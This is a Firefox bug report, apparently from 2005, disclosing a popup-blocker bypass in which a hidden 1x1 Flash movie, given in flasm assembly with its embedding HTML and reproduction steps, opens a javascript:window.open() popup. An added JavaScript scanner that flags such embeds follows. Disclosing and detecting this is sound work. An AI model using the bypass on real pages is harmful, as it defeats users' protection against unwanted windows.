Closed Bug 283381 Opened 20 years ago Closed 20 years ago

popup blocker bypass using flash file loading javascript:window.open() url

Categories

(Firefox :: General, defect)

x86
Windows XP
defect
Not set
normal

VERIFIED DUPLICATE of bug 176079

People

(Reporter: henri_torgemane, Assigned: bugzilla)

Attachments

(2 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

Found off of www.bigblueball.com.
The following is the minimal test case to reproduce it:
<html><head><title>firefox popup bypass test</title></head><body>
<!-- ffp.flm: get flasm from flasm.sf.net, then run flasm -a ffp.flm to generate ffp.swf
movie 'g:ffp.swf' compressed // flash 6, total frames: 1, frame rate: 12 fps, 1x1 px

  frame 0
    push 'javascript:k=window.open(\'', 'url'
    getVariable
    add
    push '\',\'_blank\',\'width='
    add
    push 'width'
    getVariable
    add
    push ',height='
    add
    push 'height'
    getVariable
    add
    push ',top='
    add
    push 'top'
    getVariable
    add
    push ',left='
    add
    push 'left'
    getVariable
    add
    push ',toolbar=no,location=no,scrollbars=no,status=no,resizable=no,fullscreen=no\'); void(0);'
    add
    push ''
    getURL2
  end // of frame 0
end
-->
This shows a popup in firefox 1.0 with popup blocker on.
<embed src="ffp.swf?url=http://slashdot.org/&width=500&height=300&top=200&left=200"
 width=1 height=1 allowScriptAccess="always" type="application/x-shockwave-flash">
</body></html>


Reproducible: Always

Steps to Reproduce:
1. save html sample as ffp.html. 
2. generate ffp.swf from ffp.flm. 
3. load ffp.html.


Actual Results:  
A popup to slashdot.org shows up, regardless of your popup blocker settings.

Expected Results:  
The popup should be blocked.

Since this bug report looks a lot like a cookbook recipe to bypass the popup
blocker, I'm checking the little "confidential" checkbox. 
On the other hand, the info here was found off of a public web page, and this is
not a security bug. 
I'm going on the side of caution, and I apologize if this is a bad use of said
checkbox.
Note development builds have an experimental feature to block these, see later
comments in the bug I'm duping this to.

*** This bug has been marked as a duplicate of 176079 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Status: RESOLVED → VERIFIED
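
Added example, not part of the bug report or of Mozilla's code: a heuristic scanner that flags <embed> tags showing the signals in the test case above (allowScriptAccess="always", a 1x1 size, and a URL handed in through the query string). The function names, the two-signal threshold and the sample markup are assumptions made for illustration.

```javascript
// Added example; names, the two-signal threshold and SAMPLE are assumptions.

// Parse one tag's attributes into a lower-cased name -> value map.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<\s*\w+/, "").replace(/\/?>$/, "");
  const re = /([a-zA-Z_:][-\w:.]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? "";
  }
  return attrs;
}

// Decode a query string, tolerating malformed percent-escapes.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Return embeds that show at least two of the three signals from the test case.
function findSuspectEmbeds(html) {
  const findings = [];
  const tagRe = /<embed\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const a = parseAttrs(m[0]);
    const reasons = [];
    if ((a.allowscriptaccess || "").toLowerCase() === "always") reasons.push("allowScriptAccess=always");
    if (parseInt(a.width, 10) <= 1 && parseInt(a.height, 10) <= 1) reasons.push("invisible (1x1 or smaller)");
    const src = a.src || "";
    const q = src.includes("?") ? src.slice(src.indexOf("?") + 1) : "";
    if (/(^|&)[^=&]+=(https?|javascript):/i.test(safeDecode(q))) reasons.push("URL passed in query string");
    if (reasons.length >= 2) findings.push({ src, reasons });
  }
  return findings;
}

// Constructed sample: the report's embed plus two ordinary ones.
const SAMPLE = `
<embed src="ffp.swf?url=http://slashdot.org/&width=500&height=300&top=200&left=200"
 width=1 height=1 allowScriptAccess="always" type="application/x-shockwave-flash">
<embed src="intro.swf" width=640 height=480 allowScriptAccess="sameDomain">
<embed src="banner.swf" width=468 height=60 allowScriptAccess="always">`;

console.log(JSON.stringify(findSuspectEmbeds(SAMPLE), null, 2));
```

Only the first embed in the sample is reported; the scanner reads attributes on the <embed> tag itself and does not look at <object>/<param> markup.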